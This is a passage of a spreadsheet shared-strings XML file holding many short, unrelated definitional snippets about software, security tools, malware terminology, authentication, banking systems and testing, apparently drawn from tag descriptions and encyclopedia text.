  </si>
  <si>
    <t>Native Client is an open source project that uses Software Fault Isolation to sandbox untrusted machine code and allow such to run within the context of applications such as the Chrome web browser.</t>
  </si>
  <si>
    <t>From the Vocabulary for Event Recording and Incident Sharing (VERIS):
Malware is any malicious software, script, or code developed or used for the purpose of compromising or harming information assets without the owners informed consent.</t>
  </si>
  <si>
    <t>In the typical case the operating system tries to handle the page fault by making the required page accessible at a location in physical memory or terminates the program in the case of an illegal access.</t>
  </si>
  <si>
    <t>Backporting forms part of the maintenance step in a software development process and it is commonly used for fixing security issues in older versions of the software.</t>
  </si>
  <si>
    <t>While most disk encryption software implements different and incompatible, undocumented formats, LUKS specifies a platform-independent standard on-disk format for use in various tools.</t>
  </si>
  <si>
    <t>Computer data logging is the process of recording events in a computer program, usually with a certain scope, in order to provide an audit trail that can be used to understand the activity of the system and to diagnose problems.</t>
  </si>
  <si>
    <t>Although, he thinks hacking is a broad activity, in the context of computer programming, he emphasize that computer hackers should have a solid understanding of Computer Science.</t>
  </si>
  <si>
    <t>A critical but non-technical problem with password encryption is that legal non-repudiability of transactions is lost, because it ceases to be true that only the password holder could have executed the transaction.</t>
  </si>
  <si>
    <t>Anti-cheat software is commonly used in popular games such as Team Fortress 2, Quake, or World of Warcraft.</t>
  </si>
  <si>
    <t>Software quality reflects how well a software conforms to given requirements (functional and non-functional), how much it shows characteristics like reliability, efficiency, security, maintainability.</t>
  </si>
  <si>
    <t>Typical information that is gathered in accounting is the identity of the user or other entity, the nature of the service delivered, when the service began, and when it ended, and if there is a status to report.</t>
  </si>
  <si>
    <t>Open Data generally refers to machine readable data which is made freely available (or available under licence) for public consumption.</t>
  </si>
  <si>
    <t>Questions related to the Open Source Virtual Reality (OSVR) software libraries or the OSVR Hacker Development Kit (HDK)</t>
  </si>
  <si>
    <t>A NIS/YP system maintains and distributes a central directory of user and group information, hostnames, e-mail aliases and other text-based tables of information in a computer network.</t>
  </si>
  <si>
    <t>If it discovers that a programmer is trying to communicate programming information, it will read the compiled Arduino binary coming over the serial link, store it in flash memory, send it back to over the serial link for verification, and if everything is successful, exit and launch the stored sketch.</t>
  </si>
  <si>
    <t>Bugs like this can be extremely hard to track down though; if the code always crashes in the same place then that could help, but even if it does and you can find out which address is suffering corruption, monitoring that address for rogue writes without affecting the timing of the program (and hence the manifestation of the bug) is essentially impossible.</t>
  </si>
  <si>
    <t>Optional content (PDF 1.5) refers to sub-clauses of content in a PDF document that can be selectively viewed or hidden by document authors or consumers.</t>
  </si>
  <si>
    <t>(source: wikipedia)
Role-based access control (RBAC): Role-based access control (RBAC) is a method of regulating access to computer or network resources based on the roles of individual users within an enterprise.</t>
  </si>
  <si>
    <t>Rietveld is a web-based collaborative code review tool for Subversion and released as open source, written by Guido van Rossum to run on Google's cloud service.</t>
  </si>
  <si>
    <t>Increased availability of larger registers for general purpose and media instructions, a greater addressing range and cryptography instructions enable new categories of applications for superphone and tablet computing, while bringing the ARM benefits of efficient design and low power consumption to applications where 64-bit computing is already established, such as servers and network infrastructure, promising to revolutionize the data center.</t>
  </si>
  <si>
    <t>Integrated Windows Authentication is a term associated with Microsoft products that refers to the SPNEGO, Kerberos, and NTLM authentication protocols.</t>
  </si>
  <si>
    <t>Serialization is the process of converting a data-structures or object's state into a format that can be stored (for example, in a flat file or memory buffer) or transmitted over a network, to be reconstructed later maintaining data integrity - typically in a different run-time environment which may or may not be on the same computer.</t>
  </si>
  <si>
    <t>Out of the box, Open Bank Project provides over 130 RESTful endpoints covering transaction history, payments, entitlements and metadata that developers can use to build the next generation banking applications.</t>
  </si>
  <si>
    <t>/wikipedia/
Identifying Memory Management Bugs Within Applications Using the libumem Library;
Memory Leak Detection with libumem;
Portable umem: port of the Solaris umem memory allocator to other popular operating systems, such as Linux, Windows and BSDish systems (including Darwin/OSX).</t>
  </si>
  <si>
    <t>Generally Senior tester writes test cases and after verification and approval the junior testers carry out execution of test cases.</t>
  </si>
  <si>
    <t>A blockchain  originally block chain  is a distributed ledger that is used to maintain a continuously growing list of records, called blocks.</t>
  </si>
  <si>
    <t>Digital rights management systems which prevent unauthorized use or reproduction of copyrighted material and protect software against reverse engineering (see also copy protection) are another somewhat different example of using encryption on data at rest.</t>
  </si>
  <si>
    <t>Computer forensics is a branch of digital forensic science pertaining to legal evidence found in computers and digital storage media.</t>
  </si>
  <si>
    <t>The Metasploit Framework is an open-source project owned/sponsored by Rapid7 for vulnerability assessment, exploitation development, penetration testing, and many other computer and network security-related tasks.</t>
  </si>
  <si>
    <t>Technical term, part of the specialized vocabulary of a particular
field
Scientific terminology, terms used by scientists
Contractual term, a legally binding provision
Telecom Enforcement Resource and Monitoring, the vigilance and
 monitoring wing of the Indian Department of Telecommunications</t>
  </si>
  <si>
    <t>The Intuit Customer Account Data API provides developers access to end-user financial account and transactional information from nearly 19,000 financial institutions, giving developers the ability to create custom financial applications that can range from analyzing consumer behavior to credit checks to innovative new small business solutions.</t>
  </si>
  <si>
    <t>Somehow the first part of the software created a bug in the second part, which has not changed.</t>
  </si>
  <si>
    <t>Authoring is the process of creating software with the intent of distributing it under a particular name.</t>
  </si>
  <si>
    <t>eID refers to an Electronic Identity Card, an identity card for online and offline identification towards authorities.</t>
  </si>
  <si>
    <t>This becomes critical for sensitive data like credit-cards and banking transactions.</t>
  </si>
  <si>
    <t>Safety-critical applications require an exceedingly rigorous validation and certification process.</t>
  </si>
  <si>
    <t>In other cases, software bugs are referred to jokingly as undocumented features.</t>
  </si>
  <si>
    <t>Other common types of software which use sandboxing techniques are Virtualization software.</t>
  </si>
  <si>
    <t>Perform advanced memory analysis of the infected virtualized system through Volatility as well as on a process memory granularity using YARA.</t>
  </si>
  <si>
    <t>The tool in point 1 would have imported the certificate chain into the appropriate stores (use certmgr.msc and look under Trusted Root Certificate Authorities, Intermediate Certification Authorities and the Personal store).</t>
  </si>
  <si>
    <t>Undocumented behaviour (or 'features') relates to elements of software not intended for use by end users (and therefore 'undocumented'), but left available for use by the vendor for software support and development.</t>
  </si>
  <si>
    <t>Since the suppliers of the software usually consider the software documentation to constitute a contract for the behavior of the software, undocumented features are generally left unsupported, and may be removed or changed at will and without notice to the users.</t>
  </si>
  <si>
    <t>A MPIN(Mobile banking Personal Identification number) is given to the banking customer once they register for UPI which is required to be entered while confirming a money transfer.</t>
  </si>
  <si>
    <t>Extended display identification data (EDID) is a data structure provided by a digital display to describe its capabilities to a video source (e.g.</t>
  </si>
  <si>
    <t>Open Atrium is open source collaboration software that enables organizations to securely connect their teams, projects and knowledge.</t>
  </si>
  <si>
    <t>Debugging is a methodical process of finding and fixing bugs in a computer program.</t>
  </si>
  <si>
    <t>Bluetooth is a global open wireless technology standard for exchanging data over short distances (using short wavelength radio transmissions) from fixed and mobile devices, creating personal area networks (PANs) with high levels of security.</t>
  </si>
  <si>
    <t>Malware is any malicious software, script, or code developed or used for the purpose of compromising or harming information assets without the owners informed consent.</t>
  </si>
  <si>
    <t>OPTEE (Open Portable Trusted Execution Environment) is an implementation of the Global Platform TEE System Architecture specification and is maintained by Linaro.</t>
  </si>
  <si>
    <t>A blanket term to refer to legislation and projects initiated by the Chinese government that attempt to regulate and censor parts of the internet in Mainland China.</t>
  </si>
  <si>
    <t>Programmers interested in malware analysis have many resources available to assist and guide them through various stages of the process.</t>
  </si>
  <si>
    <t>In computer networking, the term IP address spoofing or IP spoofing refers to the creation of Internet Protocol (IP) packets with a forged source IP address with the purpose of concealing the identity of the sender or impersonating another computing system.</t>
  </si>
  <si>
    <t>The Microsoft Enterprise Library Transient Fault Handling Application Block for Windows Azure ("Topaz") lets developers make their applications more resilient by adding robust transient fault handling logic.</t>
  </si>
  <si>
    <t>Powered by Kubernetes and other industry-leading open-source technologies from Google, Anthos transforms your architectural approach, lets you focus on innovation, and allows you to move faster than ever without compromising security or increasing complexity.</t>
  </si>
  <si>
    <t>See also:
CARO, the Computer Antivirus Research Organization
EICAR, the European Institute for Computer Antivirus Research
Linux malware
Malware: Anti-virus and anti-malware software
Comparison of antivirus software
List of computer viruses
Quarantine (computing)
Sandbox (computer security)
Timeline of notable computer viruses and worms
Virus hoax</t>
  </si>
  <si>
    <t>Spot is an open source cybersecurity software project for leveraging insights from data flow and packet analysis.</t>
  </si>
  <si>
    <t>Secure User Plane Location (SUPL) is an IP based protocol for Assisted GPS to receive information of GPS satellites quickly via IP instead of slowly receiving (50 bit/s) over GPS satellite signaling.</t>
  </si>
  <si>
    <t>XMLDSIG is a standards-based, interoperable way to sign and verify all or part of an XML document or other data that is addressable from a Uniform Resource Identifier (URI).</t>
  </si>
  <si>
    <t>User acceptance testing (UAT) consists of a process of verifying that a solution works for the user.</t>
  </si>
  <si>
    <t>Isolation: enables transactions to operate independently of and
transparent to each other.</t>
  </si>
  <si>
    <t>As defined on Wikipedia, IEEE 802.11, is a set of media access control (MAC) and physical layer (PHY) specifications for implementing wireless local area network (WLAN) computer communication in the 900 MHz and 2.4, 3.6, 5, and 60 GHz frequency bands.</t>
  </si>
  <si>
    <t>Phishing is the attempt to acquire sensitive information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication.</t>
  </si>
  <si>
    <t>In other words, if you have an interactive assessment application or virtual chemistry lab, it can be securely connected to an educational platform in a standard way without having to develop and maintain custom integrations for each platform.</t>
  </si>
  <si>
    <t>It's designed to be easily embedded in consumer electronics products, including battery operated devices such as remote controls, smoke alarms and security sensors.</t>
  </si>
  <si>
    <t>It is recommended you use  sha2 or another hashing system like bcrypt
In cryptography, SHA-1 is a cryptographic hash function designed by the National Security Agency (NSA) and published by the NIST as a U.S. Federal Information Processing Standard.</t>
  </si>
  <si>
    <t>Computer hacking is the practice of modifying computer hardware and software to accomplish a goal outside of the creators original purpose.</t>
  </si>
  <si>
    <t>Please refer to following code.CertificateEnrollmentManager can be used to import a certificate from a Personal Information Exchange (PFX) message.</t>
  </si>
  <si>
    <t>It's commonly used by malwares that requires HW access, it is not documented and it is controller with IOCTLs (DeviceIoControl) codes that must be gathered from reverse engineering.</t>
  </si>
  <si>
    <t>In computer science the term is often used in capability-based security, a granular way to restrict processes' rights.</t>
  </si>
  <si>
    <t>Introduction
The first version of Lint was developed by Stephen C. Johnson while at Bell Laboratories in an effort to detect bugs that may have otherwise gone unnoticed in C programs.</t>
  </si>
  <si>
    <t>Keyword extraction is tasked with the automatic identification of terms that best describe the subject of a document.</t>
  </si>
  <si>
    <t>Windows Azure Table Storage is a fault-tolerant, ISO 27001 certified NoSQL key-value store.</t>
  </si>
  <si>
    <t>Antivirus or anti-virus software is software used to prevent, detect and remove malware.</t>
  </si>
  <si>
    <t>PVS-Studio is a tool for detecting bugs and security weaknesses in the source code of programs, written in C, C++, C# and Java.</t>
  </si>
  <si>
    <t>business intelligence software providing analysis and visualizations against Microsoft's BI platform, primary against Microsoft Analysis Services, including ProClarity Analytics Server (PAS) and ProClarity Desktop Professional (PDP)</t>
  </si>
  <si>
    <t>A Cell ID (CID) is a generally unique number used to identify each Base transceiver station (BTS) or sector of a BTS within a Location area code (LAC) if not within a GSM network.</t>
  </si>
  <si>
    <t>A means of identifying individuals and verifying their eligibility to receive specific categories of information.</t>
  </si>
  <si>
    <t>Most electronic banking systems are able to sent and receive  to exchange statement information.</t>
  </si>
  <si>
    <t>It is often referred to as a data structure server since keys can contain as values different data structures:
Strings, which are binary safe and up to 512 MB in size.</t>
  </si>
  <si>
    <t>Ethereum also allows its users to write transaction guidelines called smart contracts.</t>
  </si>
  <si>
    <t>The filename is metadata about a file; a special kind of string used to uniquely identify a file stored on the file system of a computer.</t>
  </si>
  <si>
    <t>Though binary-coded decimal is less efficient memory-wise than 2's complement there are some advantages that result in BCD still being in use today, particularly in databases and applications where monetary and similarly sensitive data types are stored and manipulated.</t>
  </si>
  <si>
    <t>This makes blockchains potentially suitable for the recording of events, medical records, and other records management activities, identity management, transaction processing, and documenting provenance.</t>
  </si>
  <si>
    <t>common_schema provides with:
A function library (text functions, security routines, execution and flow control, more...)
A set of informational and analysis views (security, schema design, processes, transactions, more...)
QueryScript interpreter, allowing for server side scripting.</t>
  </si>
  <si>
    <t>Recovery testing should not be confused with reliability testing, which tries to discover the specific point at which failure occurs.Recovery testing is basically done in order to check how fast and better the application can recover against any type of crash or hardware failure etc.</t>
  </si>
  <si>
    <t>Software quality assurance (SQA) consists of a means of monitoring the software engineering processes and methods used to ensure quality.</t>
  </si>
  <si>
    <t>The Java security model is based on a customizable "sandbox" in which Java software programs can run safely, without potential risk to systems or users.</t>
  </si>
  <si>
    <t>glu is meant to be used to:
deploy (and monitor) applications to an arbitrary large set of nodes:
efficiently
with minimum/no human interaction
securely
in a reproducible manner
ensure consistency over time (prevent drifting)
detect and troubleshoot quickly when problems arise
Resources:
Project page at GitHub
Documentation
Tutorial
Forum</t>
  </si>
  <si>
    <t>Java
Additional links:
Free PVS-Studio for those who develops open source projects
Technologies used in the PVS-Studio code analyzer for finding bugs and potential vulnerabilities</t>
  </si>
  <si>
    <t>Unauthorized copying and distribution accounted for $2.4 billion in United States in 1990s, and is assumed to be causing impact on revenues in music or game industry, leading to proposal of anti-piracy laws such as PIPA.</t>
  </si>
  <si>
    <t>These are special cases of memory safety violations.</t>
  </si>
  <si>
    <t>Algorithmic trading is a technique of trading financial assets through an algorithm which has been fully or partially automated into a computer program.</t>
  </si>
  <si>
    <t>Strong Customer Authentication is a payment verification process that will typically require customers to provide two different forms of authentication from card holders in order to process transactions.</t>
  </si>
  <si>
    <t>An open-source memory leak detection system for Visual C++</t>
  </si>
  <si>
    <t>Memory corruption is an unintentional modification of a memory location due to an error in a computer program.</t>
  </si>
  <si>
    <t>Entity Framework (EF) Core is an open source ORM developed by Microsoft.</t>
  </si>
  <si>
    <t>Each authentication factor covers a range of elements used to authenticate or verify a person's identity prior to being granted access, approving a transaction request, signing a document or other work product, granting authority to others, and establishing a chain of authority.</t>
  </si>
  <si>
    <t>A bitwise mask that shows which part of the IP address is shared by all computers in the subnetwork and is used to identify them all together in some larger network.</t>
  </si>
  <si>
    <t>Version control is the management of changes to documents, programs, and other information stored as computer files.</t>
  </si>
  <si>
    <t>Blockchains are secure by design and are an example of a distributed computing system with high Byzantine fault tolerance.</t>
  </si>
  <si>
    <t>The most successful product developed in Pop-11 was the Clementine data-mining system, developed by ISL, as described in the entry on Poplog.</t>
  </si>
  <si>
    <t>Flash-based read-only array
(Advantages: saves RAM, true read-only memory safe from memory corruption bugs.</t>
  </si>
  <si>
    <t>There is a minor trade-off to this approach in that if multiple credentials for a given device can leak, you will have the banal risk of having multiple credentials leak at once.</t>
  </si>
  <si>
    <t>Thus, it is sometimes described as a reverse Turing test, because it is administered by a machine and targeted to a human, in contrast to the standard Turing test that is typically administered by a human and targeted to a machine.</t>
  </si>
  <si>
    <t>In particular, the goals of such testing may be to ensure the software does not crash in conditions of insufficient computational resources (such as memory or disk space), unusually high concurrency, or denial of service attacks.</t>
  </si>
  <si>
    <t>I am sure that this is done properly, since I am able to access my Datbase tables from the command prompt using :
$ tsql -S serverIP -U sql-username -P password
However, I do not know how to use this information in my QT program, so that I can access the information in my QT program.</t>
  </si>
  <si>
    <t>I2C and SPI qualify as OSI Network level 1 and 2 specifications, covering both physical electrical specifications of connection between devices and how the connected devices use the connection to communicate.</t>
  </si>
  <si>
    <t>They're fundamentally designed to act as a transparent serial bridge between computers to aid communications on personal networks.</t>
  </si>
  <si>
    <t>Registration is a process through which a person or entity provides some necessary information about himself to the company or other entity he/it wants to be registered with.</t>
  </si>
  <si>
    <t>MaxMind is an industry-leading provider of IP intelligence, online fraud detection tools and geolocation databases.</t>
  </si>
  <si>
    <t>HTML sanitization is the process of examining an HTML document and producing a new HTML document that preserves only whatever tags are designated "safe".</t>
  </si>
  <si>
    <t>A distributed lock manager (DLM) provides distributed software applications with a means to synchronize their accesses to shared resources.</t>
  </si>
  <si>
    <t>Virus-scanning is the process of finding and eliminating malicious software on a computer.</t>
  </si>
  <si>
    <t>Wireless refers to the technology allowing transfer of information between two points that are not physically connected.</t>
  </si>
  <si>
    <t>In some cases a payment processor, independent sales organization (ISO), or merchant service provider (MSP) is also a party to the merchant agreement.</t>
  </si>
  <si>
    <t>Both Windows 7 and Windows 8 apps must use the new Windows App Certification Kit to become certified and eligible for sale in the Windows Store.</t>
  </si>
  <si>
    <t>MinHash (or the min-wise independent permutations locality sensitive hashing scheme) is a technique for quickly estimating how similar two sets are.</t>
  </si>
  <si>
    <t>This provides several benefits, one of which is, if each process is given a separate address space, security through process isolation.</t>
  </si>
  <si>
    <t>Only the correct combination of a bank card (something that the user possesses) and a PIN (personal identification number, something that the user knows) allows the transaction to be carried out.</t>
  </si>
  <si>
    <t>Its goal is to provide tools to build safe parsers without compromising the speed or memory consumption.</t>
  </si>
  <si>
    <t>Software Patching at a Billion Miles -- Often real-time systems are also safety/mission-critical and the requirements and approaches bleed together.</t>
  </si>
  <si>
    <t>Zombie processes should not be confused with orphan processes: an orphan process is a process that is still executing, but whose parent has died.</t>
  </si>
  <si>
    <t>SHA-1 is a cryptographic hash function designed by the U.S. Government as a Federal Information Processing Standard.</t>
  </si>
  <si>
    <t>This is distinct from formal verification, where the operation of a program is determined to be correct per the specification.</t>
  </si>
  <si>
    <t>Jack has its own .jack library format and provides most tool chain features as part of a single tool: repackaging, shrinking, obfuscation and multidex.</t>
  </si>
  <si>
    <t>Administrative metadata provides information such as when and how a document was created, file type and other technical information, and who can access it.</t>
  </si>
  <si>
    <t>With an integrated security platform, Imperva data center security provides tools to combat attack, theft, and fraud, mitigate risk, and streamline regulatory compliance.</t>
  </si>
  <si>
    <t>Line is a freeware app for instant communications on electronic devices such as smartphones, tablet computers, and personal computers.</t>
  </si>
  <si>
    <t>The final report generated by the tool is meant to serve as a foundation for professional web application security assessments.</t>
  </si>
  <si>
    <t>Since it only exists for a session or a transaction the RDBMS doesn't have to worry about locks in order to synchronize between different transactions or redo information.</t>
  </si>
  <si>
    <t>A "failed alloc call" likely refers to a failure to allocate memory for an operation (encryption takes a good bit, as does every open request in the queue).</t>
  </si>
  <si>
    <t>Legal questions may be asked on Law.SE
The GNU General Public License (GPL) is a copyleft free software license and is the most popular open source license.</t>
  </si>
  <si>
    <t>-David   
Copyright and other protected material
May include:  
What the government thinks is not good for you.</t>
  </si>
  <si>
    <t>They are used to handle different workflows and risks tolerance as well as to facilitate A/B testing.</t>
  </si>
  <si>
    <t>It is specifically designed for targeting the embedded and safety-critical domains.</t>
  </si>
  <si>
    <t>In computer programming, an opaque pointer is a special case of an opaque data type, a datatype declared to be a pointer to a record or data structure of some unspecified type.</t>
  </si>
  <si>
    <t>Background
We already completed device design and non-working mock ups
As a start-up, MFi certification was delayed (Finally we got it)
So, we've designed / developed PCB board without apple authentication coprocessor before MFi certification.</t>
  </si>
  <si>
    <t>This may or may not cause a memory protection error or program failure depending on implementation details.</t>
  </si>
  <si>
    <t>for questions that involve penetration testing tools of all major platforms.</t>
  </si>
  <si>
    <t>OPTEE (Open Portable Trusted Execution Environment)  is an implementation of GP TEE specification.</t>
  </si>
  <si>
    <t>A program that contains a large number of bugs, and/or bugs that seriously interfere with its functionality, is said to be buggy.</t>
  </si>
  <si>
    <t>Polly is a .NET resilience and transient-fault-handling library that allows developers to express policies such as Retry, Circuit Breaker, Timeout, Bulkhead Isolation, and Fallback in a fluent and thread-safe manner.</t>
  </si>
  <si>
    <t>Pundit provides a set of helpers that guide Ruby programmer in leveraging regular Ruby classes and object oriented design patterns to build a simple, robust and scaleable authorization system.</t>
  </si>
  <si>
    <t>Because it
  is designed as a series of components that work securely together,
  HealthShare can be configured in a variety of ways, from clinical
  document sharing to fully integrated private or public health
  information exchange.</t>
  </si>
  <si>
    <t>OmiseGO was created to achieve two goals:
Create the OMG Money Gateway as a scaling solution for Ethereum focused on enabling payments, trades, and other financial transactions in both crypto and fiat.</t>
  </si>
  <si>
    <t>OpenNMS is an enterprise grade network monitoring and network management platform developed under the free software or open source model.</t>
  </si>
  <si>
    <t>There are a number of free and open source and commercial face recognition tools and libraries.</t>
  </si>
  <si>
    <t>A device instance ID is a Windows system-supplied device identification string that uniquely identifies a device in an operating system.</t>
  </si>
  <si>
    <t>It supports the most common NLP tasks, such as tokenization, sentence segmentation, part-of-speech tagging, named entity extraction, chunking, parsing, and coreference resolution.</t>
  </si>
  <si>
    <t>To avoid the capability of people to tamper with your software, you'll need hardware that enforces the non-tampering.</t>
  </si>
  <si>
    <t>One method of combination, referred to as transparent negotiation, occurs when a cache uses the agent-driven negotiation information provided by the origin server in order to provide server-driven negotiation for subsequent requests.</t>
  </si>
  <si>
    <t>Microsoft Information Protection is the effort to streamline the information protection ecosystem across Windows, Office, and Azure.</t>
  </si>
  <si>
    <t>Code Analysis is the process of analyzing the code of the application to discover, review, validate or verify certain properties of the application.</t>
  </si>
  <si>
    <t>Modifications to fault handles allow kernel developers to analyze unexpected faults.</t>
  </si>
  <si>
    <t>SVRL (Schematron Verification Report Language) is a simple report language defined as part of ISO Schematron.</t>
  </si>
  <si>
    <t>OVI became part of Accellera, a non-profit organization that develops standards for modeling and verifying system-level designs.</t>
  </si>
  <si>
    <t>App Center streamlines the process of gathering the necessary device identifiers from testers, performing the registration and signing.</t>
  </si>
  <si>
    <t>ACID (atomicity, consistency, isolation, durability) is a set of properties that guarantees that database transactions are processed reliably.</t>
  </si>
  <si>
    <t>Payment gateways are a way to securely communicate a transaction between a payee (the merchant, and their acquiring bank) and a payer (the customer, and their issuing bank).</t>
  </si>
  <si>
    <t>HACKERRANK
HackerRank is a site for hackers from all over the world to solve programming problems in different CS domains like algorithms, machine learning and artificial intelligence, and to excel in different programming paradigms like functional programming.</t>
  </si>
  <si>
    <t>the daemon runs under systemd and all other modules are docker containers as described here https://docs.microsoft.com/en-us/azure/iot-edge/about-iot-edge
The runtime is described as "Maintains Azure IoT Edge security standards on the device."</t>
  </si>
  <si>
    <t>The technical basis is provided by strong cryptography and distributed ledger technology, also referred to as blockchain technology.</t>
  </si>
  <si>
    <t>The term "virus" is also commonly, but erroneously, used to refer to other types of malware, including but not limited to adware and spyware programs that do not have a reproductive ability.</t>
  </si>
  <si>
    <t>As well as being famous for being used in safety critical embedded systems it is now being found in more commercial settings such as automotive information systems and the Blackberry Tablet OS runs on top of the QNX Neutrino RTOS.</t>
  </si>
  <si>
    <t>A merchant account is established under an agreement between an acceptor and a merchant acquiring bank for the settlement of payment card transactions.</t>
  </si>
  <si>
    <t>Shared Primary Key is very often used in conjunction with a design pattern described under the tag class-table-inheritance.</t>
  </si>
  <si>
    <t>Applications designed for Windows Vista and later versions of Windows should not write to sensitive system areas, nor should they rely on virtualization to remedy any problems.</t>
  </si>
  <si>
    <t>SmartAssebly is an obfuscation, crash reporting, and feature usage reporting tool for .NET from Red-Gate Software Ltd.
SmartAssembly website</t>
  </si>
  <si>
    <t>more 
Quality Assurance Tools
In recent years, there has been a steady increase of quality assurance tools in the PHP world.</t>
  </si>
  <si>
    <t>Caution should be used when using reflection - the modification of a program's entity during runtime can lead to hard to detect bugs which are generally severe.</t>
  </si>
  <si>
    <t>Malware includes computer viruses, computer worms, Trojan horses, most rootkits, spyware, dishonest adware and other malicious or unwanted software, including true viruses.</t>
  </si>
  <si>
    <t>He proposed this term as an alternative to what he calls the "popular but misleading term self-executing anonymous function".</t>
  </si>
  <si>
    <t>Cuckoo Sandbox is an open source automated malware analysis system</t>
  </si>
  <si>
    <t>It is developed by Intel at the Intel Open Source Technology Center.</t>
  </si>
  <si>
    <t>An HP Fortify installation consists of an optional web based management application HP Fortify Software Security Center ("SSC") and one or more of the following analyzers:
 HP Fortify Static Code Analyzer: Analyzes your source code against a body of rules to detect likely vulnerabilities at the implementation layer.</t>
  </si>
  <si>
    <t>It is an open industry forum for the development of a global standard for the interface of IP-based physical security products.</t>
  </si>
  <si>
    <t>osquery is an open-source, cross-platform endpoint security monitoring and system information tool.</t>
  </si>
  <si>
    <t>It directs Internet traffic through a free, worldwide volunteer network consisting of thousands of relays to conceal a user's location or usage from anyone conducting network surveillance or traffic analysis.</t>
  </si>
  <si>
    <t>Segmentation fault is caused by trying to read or write an illegal memory location.</t>
  </si>
  <si>
    <t>Eclipsys Corporation was a publicly traded American company that provided hospitals and other healthcare organizations with electronic medical record information systems.</t>
  </si>
  <si>
    <t>Usage:
Aegis (change management software), a change management system used for software development
Aegis SecureConnect, a network authentication system popular in IEEE 802.1X networks
Aegis (operating system), the original Apollo Computer operating system
Aegis (Ragnarok Online), the software used to run the official servers for the Ragnarok Online computer game
Aegis (window manager), a window manager for the X Window System
Read more:
http://en.wikipedia.org/wiki/Aegis_%28management_software%29
http://en.wikipedia.org/wiki/AEGIS_SecureConnect
http://en.wikipedia.org/wiki/Domain/OS#AEGIS
http://en.wikipedia.org/wiki/AEGIS_%28Ragnarok_Online%29</t>
  </si>
  <si>
    <t>Its main features are:
Identification and verification of a user via user id and password check (authentication)
Identification, classification and protection of system resources
Maintenance of access rights to protected resources (authorization)
Control the means of access to protected resources
Logging of accesses to a protected system and protected resources (auditing)
RACF establishes security policies rather than just permission records.</t>
  </si>
  <si>
    <t>The Native Client (NaCl) and Portable Native Client (PNaCl) open-source technologies are designed to run operating system independent, native compiled code securely inside browsers by containing the compiled code in a sandbox.</t>
  </si>
  <si>
    <t>However, antivirus professionals do not accept the concept of benevolent viruses, as any desired function can be implemented without involving a virus (automatic compression, for instance, is available under the Windows operating system at the choice of the user).</t>
  </si>
  <si>
    <t>Uniface can maintain referential integrity across the multiple platforms and even transaction integrity providing the underlying databases support two-phase commit.</t>
  </si>
  <si>
    <t>From the wikipedia page:
OpenNI or Open Natural Interaction is an industry-led, not-for-profit organization focused on certifying and improving interoperability of natural interaction devices, applications that use those devices and middleware that facilitates access and use of such devices</t>
  </si>
  <si>
    <t>A obfuscation, crash reporting, and feature usage reporting tool for .NET from Red-Gate Software Ltd.</t>
  </si>
  <si>
    <t>Certificate Transparency (CT) is an experimental IETF open standard[1] and open source framework for monitoring and auditing digital certificates.</t>
  </si>
  <si>
    <t>The iBook Authoring tool - allows users to generate apple specific authoring language which is a derivative of ePub 3 standard.</t>
  </si>
  <si>
    <t>Suppliers of barcode labels and suppliers of products that must meet customer labeling specifications are often contractually obligated to submit samples for verification.</t>
  </si>
  <si>
    <t>Compliance with the standards is mandated by the various card schemes but is communicated through acquiring banks or other parties.</t>
  </si>
  <si>
    <t>Kali Linux is a Debian Linux based penetration testing distribution.</t>
  </si>
  <si>
    <t>Starting with the  in order to define the characteristics of the various memory areas used during program execution, including the base address, the size and access privileges like executability and writability.</t>
  </si>
  <si>
    <t>Osclass is PHP based open source project that allows you to create and manage a classifieds site almost without any technical knowledge.</t>
  </si>
  <si>
    <t>This is an open source KVM implementation from AWS that is optimised for high security, isolation, speed and low resource consumption.</t>
  </si>
  <si>
    <t>Concerns about these systems have centered on privacy fears of government tracking citizens' movements, misidentification, high error rates, and increased government spending.</t>
  </si>
  <si>
    <t>Topics related to coding patterns and best practices for avoiding common bugs and security holes.</t>
  </si>
  <si>
    <t>In the context of programming, theorem provers are increasingly influencing the design of programming languages, and methods for verifying program correctness.</t>
  </si>
  <si>
    <t>Recommendations
I recommend you:
Choose a special (or set of special) pipe addresses to be used to advertise the network information on (e.g.</t>
  </si>
  <si>
    <t>Industry-leading and first comprehensive HIPAA testing solution for pre-production transaction testing and certification.</t>
  </si>
  <si>
    <t>Security testing is a process intended to reveal flaws in the security mechanisms of an information system that protect data and maintain functionality as intended.</t>
  </si>
  <si>
    <t>It provides tools that simplifies the authentication for your applications and APIs using industry standards such as SAML, OpenID Connect, JSON Web Token, OAuth 2.0, OAuth 1.0a, WS-Federation and OpenID, preventing any type of vendor lock-in.</t>
  </si>
  <si>
    <t>It also provides code to do the detection (but you got that part working already) and tracking (which you will need) 
https://www.pyimagesearch.com/2018/08/13/opencv-people-counter/
Next to that the easiest way to track is by linking the boxes with the highest iou.</t>
  </si>
  <si>
    <t>The ASP.NET profile feature associates information with an individual user and stores the information in a persistent format.</t>
  </si>
  <si>
    <t>Ivory gives strong guarantees of type and memory safety, and has features which allow the programmer to specify other safety properties.</t>
  </si>
  <si>
    <t>It allows a designer to express specific properties of a digital circuit, or other aspects of the design which are of interest in circuit verification.</t>
  </si>
  <si>
    <t>Thanks to a conservative approach to software updates, a unique Update Manager and the robustness of its Linux architecture, Linux Mint requires very little maintenance (no regressions, no antivirus, no anti-spyware...etc).</t>
  </si>
  <si>
    <t>the standardization of the common content, meaning, and representation of biometric data formats of biometric types considered in the specific parts of ISO/IEC 19794.</t>
  </si>
  <si>
    <t>This module (which is now part of the core Hibernate module) allows you to easily track all changes to Hibernate entities by creating audit records for each change behind the scene.</t>
  </si>
  <si>
    <t>pysandbox is unable to limit the memory of the sandbox process: you have to use
your own protection.</t>
  </si>
  <si>
    <t>more efficient information distribution
increased scalability
a reduction in network bandwidth consumption dramatically;
reduces update rates to seconds;
is well suited for remote sensing and control;
maximizes available bandwidth;
lightweight overhead;
uses permission-based security;
has a robust ecosystem and is used by the oil-and-gas industry,
Amazon.com and Facebook;
can save development time;
the publish/subscribe protocol collects more data with less bandwidth
compared to polling protocols.</t>
  </si>
  <si>
    <t>Features
Open source, published under the GNU General Public License, and FREE
HTML5 and CSS3 
Responsive across multiple devices and platforms
Deliver courses through SCORM compliant LMS or stand-alone 
22 bundled plug-ins, more available through the community 
Meets WAI AA accessibility standards 
Right-To-Left compatibility 
Assessments with support for question banks, randomisation, and customisable feedback
Step locking and bookmarking
Customisable theme</t>
  </si>
  <si>
    <t>SonarQube is an open source platform for continuous inspection of code quality to perform automatic reviews with static analysis of code to detect bugs, code smells and security vulnerabilities on 20+ programming languages.</t>
  </si>
  <si>
    <t>Key Features:
